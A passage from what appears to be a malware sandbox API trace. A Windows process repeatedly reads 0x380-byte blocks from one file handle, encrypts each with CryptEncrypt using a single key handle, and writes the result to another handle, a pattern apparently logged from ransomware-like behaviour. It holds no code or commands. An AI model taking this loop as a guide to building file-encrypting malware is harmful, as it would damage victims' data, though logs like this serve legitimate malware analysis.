lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.607] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.608] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.609] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.610] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.611] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.612] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.613] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, 